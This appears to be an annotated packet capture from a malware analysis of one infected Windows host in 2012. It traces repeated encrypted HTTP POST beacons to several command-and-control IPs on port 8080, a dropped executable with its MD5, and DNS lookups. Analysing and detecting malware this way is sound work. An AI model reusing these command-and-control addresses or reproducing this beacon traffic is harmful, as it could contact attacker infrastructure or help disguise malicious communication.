-----------details-internet traffic------------------- //Try to reach 208.87.243.18 192.168.7.84 208.87.243.18 TCP sbl > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1 208.87.243.18 192.168.7.84 TCP http-alt > sbl [RST, ACK] Seq=1 Ack=1 Win=0 Len=0 // a http POST command to 74.207.237.170:8080 192.168.7.84 74.207.237.170:8080 HTTP POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1 POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US) Host: 74.207.237.170:8080 Content-Length: 347 Connection: Keep-Alive Cache-Control: no-cache ......dU..ZP....Y.yy..|4$R.".....u...+T..1L.;I.n6v39.+.. DP.....O@xt,U..V|............c1..4~: R.E.........K.:+.....Z`.. y.....e.z...B.....^...bG..B.opBx0E\ .....B..N.]....g.^......59.L.l.M.....>q)..Q...\5..p...M..q... W-.*...u.P.\p......2.K..HM7..~Z?vX.p.W..0.m....A?.u....=|<.\.' .......5._7'..46..G\.o" ....}...E..K...2eE..,.U.=.C....KtU.... u..2.~@ 0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E. 0010 01 83 00 3f 40 00 80 06 f8 bf c0 a8 07 54 4a cf ...?@... .....TJ. 0020 ed aa 04 11 1f 90 5a 54 91 b8 89 da 8f 5b 50 18 ......ZT .....[P. 0030 42 30 27 30 00 00 2e d7 f7 a7 03 ea 64 55 cf d6 B0'0.... ....dU.. 0040 5a 50 e9 81 b2 b6 59 09 79 79 e6 b8 7c 34 24 52 ZP....Y. yy..|4$R 0050 a3 22 06 a4 11 86 ac 75 e0 08 b3 2b 54 12 a4 31 .".....u ...+T..1 : : : : 0130 70 18 57 c8 97 30 ac 6d 93 08 fb a2 41 3f aa 75 p.W..0.m ....A?.u 0140 c7 83 e7 af 3d 7c 3c ef 5c 05 27 83 1e 2e d1 9b ....=|<. \.'..... 0150 88 df 35 1f 5f 37 27 f1 f9 34 36 0e b0 47 5c b7 ..5._7'. .46..G\. 0160 6f 22 20 16 cb e9 9c 7d 01 98 08 45 9f a5 4b bf o" ....} ...E..K. 0170 d5 90 32 65 45 e4 e9 2c b0 55 1d 3d ca 43 e2 e8 ..2eE.., .U.=.C.. 0180 d8 d5 4b 74 55 e1 f6 9e 8d 75 a1 92 32 1c 7e 40 ..KtU... .u..2.~@ 0190 7c | // With the encryption reply long binary data... Server: nginx/1.0.10 Date: Sat, 15 Dec 2012 09:58:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/5.3.18-1~dotdeb.0 Vary: Accept-Encoding f3b .}.%..k..o.-..U...........C..8.C.0...o...E.d... snip 2U...`......p_| ]X.$...B..A.F....}.snip .@C...4*j..|.\..%..xv-.....snip .1..x.....2.....`3....3.1..7......M.k..r-5s.8P=snip z.nT^MV..{+=3ym........Gj.3JV....x..xe{@.......snip [.UK.un2.>.W`..{.9'+.7*f..v.................F.M.snip v....[...M.O.......P2.....;..a\..^..Rv&..9P...xsnip n..Z...fG..t...1.|...`Vsnip ...#^&5.[...K...!i}...}.44...@...Zp`.."....*...snip %.(.....T .C.Md.#-.{q........G.&5+.N.,.R.....V>snip .g.{1...d..+t....T.g$....#..bMQ.f.5x.....pM'"a.snip : :snip : .%......8{..6...J..$:?..E.+..C"...V'uZ1M..$Cy6}.1snip 3.!.i~..N.a..;^..+..a..[..J.~...7}....W...q.rR..n(."snip . http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1 132.248.49.112 192.168.7.84 TCP http-alt > afrog [RST, ACK] Seq=1 Ack=1 Win=0 Len=0 // At this point, in the %Temp% folder, the previous data was saved: FileName: exp2.tmp.exe tiimeStamp: 2012/12/15 18:58 122,880 MD5 ce7474646297ed818bb8ed48f50c7e1e // DNS requests to... 112.49.248.132.in-addr.arpa web.ecologia.unam.mx 77.65.130.113.in-addr.arpa ns.shinbiro.com..domain 00000000 35 ea 01 00 00 01 00 00 00 00 00 00 03 31 31 32 5....... .....112 00000010 02 34 39 03 32 34 38 03 31 33 32 07 69 6e 2d 61 .49.248. 132.in-a 00000020 64 64 72 04 61 72 70 61 00 00 0c 00 01 ddr.arpa ..... 00000000 35 ea 81 80 00 01 00 01 00 00 00 00 03 31 31 32 5....... .....112 00000010 02 34 39 03 32 34 38 03 31 33 32 07 69 6e 2d 61 .49.248. 132.in-a 00000020 64 64 72 04 61 72 70 61 00 00 0c 00 01 c0 0c 00 ddr.arpa ........ 00000030 0c 00 01 00 00 1c 1f 00 16 03 77 65 62 08 65 63 ........ ..web.ec 00000040 6f 6c 6f 67 69 61 04 75 6e 61 6d 02 6d 78 00 ologia.u nam.mx. 0000002D cb 61 01 00 00 01 00 00 00 00 00 00 02 37 37 02 .a...... .....77. 0000003D 36 35 03 31 33 30 03 31 31 33 07 69 6e 2d 61 64 65.130.1 13.in-ad 0000004D 64 72 04 61 72 70 61 00 00 0c 00 01 dr.arpa. .... 0000004F cb 61 81 83 00 01 00 00 00 01 00 00 02 37 37 02 .a...... .....77. 0000005F 36 35 03 31 33 30 03 31 31 33 07 69 6e 2d 61 64 65.130.1 13.in-ad 0000006F 64 72 04 61 72 70 61 00 00 0c 00 01 c0 0f 00 06 dr.arpa. ........ 0000007F 00 01 00 00 07 07 00 2e 02 6e 73 08 73 68 69 6e ........ .ns.shin 0000008F 62 69 72 6f 03 63 6f 6d 00 06 64 6f 6d 61 69 6e biro.com ..domain 0000009F c0 3b 77 bf 64 79 00 00 2a 30 00 00 0e d8 00 12 .;w.dy.. *0...... 000000AF 75 00 00 01 51 80 u...Q. //Another POST command detected to 203.113.98.131:80 POST /asp/intro.php HTTP/1.0 Host: 203.113.98.131 Accept: */* Accept-Encoding: identity, *;q=0 Content-Length: 257 Connection: close Content-Type: application/octet-stream Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) CRYPTED0...DK.V..aa..c.....PI%.^D.|2.s;.p..T=....*.........MX.../......../.;(.dl7).c..).......Jk.rO..e....!].......w .....}..5.+..6.SD4.> t......K...M........\..G...7V/..5].....|.....#.....=.P*^k.....b3cm.8..6..O...T....$|.......yb.~#...k0.|........o...[JD.HTTP/1.1 200 OK Server: nginx/1.0.10 Date: Sat, 15 Dec 2012 10:01:37 GMT Content-Type: text/html; charset=windows-1251 Connection: close X-Powered-By: PHP/5.3.18-1~dotdeb.0 Vary: Accept-Encoding Content-Length: 16 STATUS-IMPORT-OK // At this point the malware process exp2.tmp.exe was started.... ---------------take 2--------------------- // send ACK packet (try to connect) to 74.207.237.170 192.168.7.84 74.207.237.170 TCP danf-ak2 > http-alt [RST, ACK] Seq=1 Ack=1 Win=0 Len=0 // send ping to 209.190.61.50 209.190.61.50 192.168.7.84 ICMP Time-to-live exceeded (Time to live exceeded in transit) 209.190.61.50 192.168.7.84 ICMP Time-to-live exceeded (Time to live exceeded in transit) // make communications via HTTP/POST to 174.143.174.136:8080 //post.... POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US) Host: 174.143.174.136:8080 Content-Length: 408 Connection: Keep-Alive Cache-Control: no-cache .m......(...P..0.w.j."...V....s.x.....c.....FH..?.. .I.t..`....OA&../.?$..._J.. .....b...ws.'I..l..r........}....+`91.R..+..P.....7q..+Q...........-\g'G.6..l...rV..[.4S..K.5'!?...=.......S...2AkUh..S....b4..#....!.$. .+d;K..].>&....._g.w...i)..}.,.....f..YD.G.KI....9......rZ .~q.+......Sk.i...........t....!.m*......;..w."...[.' ..i...:..$..w.....X1gR+..U}b..U..../....(...K.FIAVR..4.....,...ujk...i....H..eHTTP/1.1 200 OK // reply: Server: nginx/1.0.10 Date: Sat, 15 Dec 2012 10:13:52 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.3.18-1~dotdeb.0 Vary: Accept-Encoding Content-Length: 165 ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5 .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK 2U...`......\z#W.2.Pp_..NU.. // post... POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US) Host: 174.143.174.136:8080 Content-Length: 387 Connection: Keep-Alive Cache-Control: no-cache ........b,.B..k'..`.9...r...7)@.~..^..E..o....y..YP .o...*gp......y..w........QF..^...J.......oV)vs..0eh....H....h7.K%Q,.c..I.U~S...\..?....g...Re,...\.?<.]2~.kw..M..t._.?.z.M<...h.-..Q.W.......Dg.3.1.."{Tf..RKw..9".T.......-." ..f(X..8..._...3*~+.%..Y.FH...\..:../.!.1G.I9..........o).........6*dXm.|-....$.6.. ..........8.....TJ...U....4TX.IdJ|b.=.e....h.G.....A...>.pC6.......]t..C'..HTTP/1.1 200 OK //reply.... Server: nginx/1.0.10 Date: Sat, 15 Dec 2012 10:13:52 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.3.18-1~dotdeb.0 Vary: Accept-Encoding Content-Length: 165 ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5 .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK 2U...`........X.'8...".~K..J. // Try to esablish connection with 199.71.215.194 192.168.7.84 199.71.215.194 TCP cognex-insight > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1 199.71.215.194 192.168.7.84 TCP http-alt > cognex-insight [RST, ACK] Seq=1 Ack=1 Win=0 Len=0 // Communication via HTTP/POST with 210.56.23.100:8080 POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US) Host: 210.56.23.100:8080 Content-Length: 387 Connection: Keep-Alive Cache-Control: no-cache ./Pl$,........*|.`..9...R{...B.....A...#.H..K.=e.......(.np...nn..y...M a.........2S...S..{|?....A.k.......... ..Q#.g..~........S...\..?....g...Re,....s.I..]..,......@I.R..P.n....I;te.<&......-9.!......8j...R.......Y....*.D&..={pY.3.l".;......xn..g.N.....T..,>..rOJ!..D=.>.J.. .(q..... ..P&....m.u6.....?....#.).W.........z....(.FF V.R ...-v!..38s)ab|....bKU..$..S...O.....HTTP/1.1 200 OK Server: nginx/1.0.11 Date: Sat, 15 Dec 2012 10:05:22 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.3.18-1~dotdeb.0 Vary: Accept-Encoding Content-Length: 165 ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5 .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK 2U...`.........c.M..A..9..... //try connect again with 132.248.49.112 192.168.7.84 132.248.49.112 TCP rdrmshc > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1 132.248.49.112 192.168.7.84 TCP http-alt > rdrmshc [RST, ACK] Seq=1 Ack=1 Win=0 Len=0 // try to connect w/ 74.117.61.66 192.168.7.84 74.117.61.66 TCP socks > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1 74.117.61.66 192.168.7.84 TCP http-alt > socks [RST, ACK] Seq=1 Ack=1 Win=0 Len=0 Communicating via HTTP/POST w/210.56.23.100:8080 POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US) Host: 210.56.23.100:8080 Content-Length: 387 Connection: Keep-Alive Cache-Control: no-cache ./Pl$,........*|.`..9...R{...B.....A...#.H..K.=e.......(.np...nn..y...M a.........2S...S..{|?....A.k.......... ..Q#.g..~........S...\..?....g...Re,....s.I..]..,......@I.R..P.n....I;te.<&......-9.!......8j...R.......Y....*.D&..={pY.3.l".;......xn..g.N.....T..,>..rOJ!..D=.>.J.. .(q..... ..P&....m.u6.....?....#.).W.........z....(.FF V.R ...-v!..38s)ab|....bKU..$..S...O.....HTTP/1.1 200 OK Server: nginx/1.0.11 Date: Sat, 15 Dec 2012 10:05:22 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.3.18-1~dotdeb.0 Vary: Accept-Encoding Content-Length: 165 ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5 .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK 2U...`.........c.M..A..9..... //Try to communicate w/ 173.192.229.36 173.192.229.36 192.168.7.84 TCP http-alt > mctp [RST, ACK] Seq=1 Ack=1 Win=0 Len=0 192.168.7.84 173.192.229.36 TCP mctp > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1 // Communication HTTTP/POST with 69.64.89.82:8080 POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US) Host: 69.64.89.82:8080 Content-Length: 387 Connection: Keep-Alive Cache-Control: no-cache ..[. 8.|. . ...+...n.^.7.Mh=..R......Y....I.r$.O.....j..g..7l.4p#&....H.G5..P-.........ld}.l[......xd&..? ....)...>))'D;vgQ.....S...\..?....g...Re,.O..j.~y....+..?.S......a..5.....L.%.3v......... .......g.Xf...f..0.i`f..].E~\Z..4.G.....Nn.b..~......Dw.N...S.iW.......oI...W....t.!Hp.#8h..uAK...4L......j....f...]./ .e...3k.o.b......T....[lm^8.X......l...."+9...2.v.\...GN..-....?.A".5wkRHTTP/1.1 200 OK Server: nginx/1.0.10 Date: Sat, 15 Dec 2012 02:51:22 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.3.18-1~dotdeb.0 Vary: Accept-Encoding Content-Length: 165 ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5 .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK 2U...`......O..z.zj....>..;.. // try to establish conn to: 173.224.221.135 192.168.7.84 173.224.221.135 TCP ltp-deepspace > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1 173.224.221.135 192.168.7.84 TCP http-alt > ltp-deepspace [RST, ACK] Seq=1 Ack=1 Win=0 Len=0 // try to estacblish conn to: 59.90.221.6 192.168.7.84 59.90.221.6 TCP ardus-trns > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1 59.90.221.6 192.168.7.84 TCP http-alt > ardus-trns [RST, ACK] Seq=1 Ack=1 Win=0 Len=0 // try to establish to 180.235.150.72 192.168.7.84 180.235.150.72 TCP sacred > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1 180.235.150.72 192.168.7.84 TCP http-alt > sacred [RST, ACK] Seq=1 Ack=1 Win=0 Len=0 // Communicating via HTTP/POST to 123.49.61.59:8080 POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US) Host: 123.49.61.59:8080 Content-Length: 387 Connection: Keep-Alive Cache-Control: no-cache ...:..'....F..oP.Ka.2U.d....N~9..|.....,.. ... 8....!'......Cr..,.8 ..F[....z.%_...p.L..........C':.rq.t...U..H..7.b.........I.IS...\..?....g...Re,..C...V..:...D.....W.3..jO...Sh`j.4.,....A.#..zcm.G.....D.6..4/.........s4\>..G.dh...........-........).%j...-mG..#W.......&d.....g.Y..(.w.Vs&.rj...uAV....>^1.J.J..4.....M...Rp..%..n.k.....wt....x........}.z`..d.:.$ ..9..:...;I\....G/.G....HTTP/1.1 200 OK Server: nginx/1.0.10 Date: Sat, 15 Dec 2012 10:29:47 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.3.18-1~dotdeb.0 Vary: Accept-Encoding Content-Length: 165 ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5 .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK 2U...`.......^...R.L&F..x....POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US) Host: 123.49.61.59:8080 Content-Length: 387 Connection: Keep-Alive Cache-Control: no-cache g..7...:R...g\.....F......@..8B..w...}.28..^....})u...ZR.exi.f......h..T..s..j..4..'m.E....SZ?.R@f. .l...(>..U.~N=;..Z......&...S...\..?....g...Re,.,.".+..y.&U..X.f...G7J.$ s ..7#?..3..b.UC.]....`.-.,.......v....C......F9'.&...Q.L..A..6+..N.Vx.......+.R..o.l...%.Q.qSR.W..IBpoy...Y. n..7b ..jW.qO.*.j.'..f)I_7. R...5.0AY7....m..X...>..\M.QN.p.r.P.&f......Y.0.'..!e..j.s.-w>.HwL..j.0..[. HTTP/1.1 200 OK Server: nginx/1.0.10 Date: Sat, 15 Dec 2012 10:30:01 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.3.18-1~dotdeb.0 Vary: Accept-Encoding Content-Length: 165 ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5 .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK 2U...`......,.&.3.."cz@..[.a. // Communicating with HTTP/POST with 123.49.61.59:8080 POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US) Host: 123.49.61.59:8080 Content-Length: 387 Connection: Keep-Alive Cache-Control: no-cache .K.Vn%d...;.Q6K.vq..)...T...e.,....c.q.K..............-.....t:.Hy(.....K.....t.d.......L,..7...}%..h&...?..)..*.@....Hg...ys.$A.S...\..?....g...Re,....H1ij..b.KC.....DJ....y.C2.I.0....#.4 ...H...hi....~.T%5.M*v..z`..v....r..b....K.yQ...Se..5....Z2.r.+...H9..8.^A..>....".....]..&....\...`"/r...:e.mO..w.4..7...Q..!...Ll..(..I.M>x.\.Y>...ET...=.S.'.....(..( ...4Q.F.LN.......AI.&.*.w.u4..HTTP/1.1 200 OK Server: nginx/1.0.10 Date: Sat, 15 Dec 2012 10:29:45 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.3.18-1~dotdeb.0 Vary: Accept-Encoding Content-Length: 165 ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5 .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK 2U...`.........X)myU.>.^....JPOST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US) Host: 123.49.61.59:8080 Content-Length: 387 Connection: Keep-Alive Cache-Control: no-cache ...:..'....F..oP.Ka.2U.d....N~9..|.....,.. ... 8....!'......Cr..,.8 ..F[....z.%_...p.L..........C':.rq.t...U..H..7.b.........I.IS...\..?....g...Re,..C...V..:...D.....W.3..jO...Sh`j.4.,....A.#..zcm.G.....D.6..4/.........s4\>..G.dh...........-........).%j...-mG..#W.......&d.....g.Y..(.w.Vs&.rj...uAV....>^1.J.J..4.....M...Rp..%..n.k.....wt....x........}.z`..d.:.$ ..9..:...;I\....G/.G....HTTP/1.1 200 OK Server: nginx/1.0.10 Date: Sat, 15 Dec 2012 10:29:47 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.3.18-1~dotdeb.0 Vary: Accept-Encoding Content-Length: 165 ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5 .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK 2U...`.......^...R.L&F..x....POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US) Host: 123.49.61.59:8080 Content-Length: 387 Connection: Keep-Alive Cache-Control: no-cache g..7...:R...g\.....F......@..8B..w...}.28..^....})u...ZR.exi.f......h..T..s..j..4..'m.E....SZ?.R@f. .l...(>..U.~N=;..Z......&...S...\..?....g...Re,.,.".+..y.&U..X.f...G7J.$ s ..7#?..3..b.UC.]....`.-.,.......v....C......F9'.&...Q.L..A..6+..N.Vx.......+.R..o.l...%.Q.qSR.W..IBpoy...Y. n..7b ..jW.qO.*.j.'..f)I_7. R...5.0AY7....m..X...>..\M.QN.p.r.P.&f......Y.0.'..!e..j.s.-w>.HwL..j.0..[. HTTP/1.1 200 OK Server: nginx/1.0.10 Date: Sat, 15 Dec 2012 10:30:01 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.3.18-1~dotdeb.0 Vary: Accept-Encoding Content-Length: 165 ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5 .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK 2U...`......,.&.3.."cz@..[.a. //Try to establish conn to: 113.130.65.77 192.168.7.84 113.130.65.77 TCP hpvmmcontrol > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1 113.130.65.77 192.168.7.84 TCP http-alt > hpvmmcontrol [RST, ACK] Seq=1 Ack=1 Win=0 Len=0 //Try to establish conn to: 180.235.150.72 802 795.966247 192.168.7.84 180.235.150.72 TCP saphostctrls > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1 803 796.070637 180.235.150.72 192.168.7.84 TCP http-alt > saphostctrls [RST, ACK] Seq=1 Ack=1 Win=0 Len=0 // making communication via HTTP/POST to 69.64.89.82:8080 POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US) Host: 69.64.89.82:8080 Content-Length: 387 Connection: Keep-Alive Cache-Control: no-cache .X...j.K.!L.C..............3.8.|...........w..9...W .K.Q....se.....k....y.;..6=$..%%.O....k'....iu|......=.?u..]%....?../...\...S...\..?....g...Re,.]...n.G.j..0O.X.rQ l...[.h.........-.zR..J\...".Q w..Yv..}:n..R.....6z.S0......_+.sXx....3n!.w..]k.o...d;^......b...8.h8.g.a...C.|C...m...4.M..[ .T..3!k..T.U=1N.~d.c..C.m.... ..}..&..y_5..u ..Z...Z4;.u@..|A..&..G|}._.\.L.....A....u..|`..'. HTTP/1.1 200 OK Server: nginx/1.0.10 Date: Sat, 15 Dec 2012 02:55:11 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.3.18-1~dotdeb.0 Vary: Accept-Encoding Content-Length: 165 ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5 .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK 2U...`......]...v.T.v..%s.\.$ -----------------------------internet data ends--------------------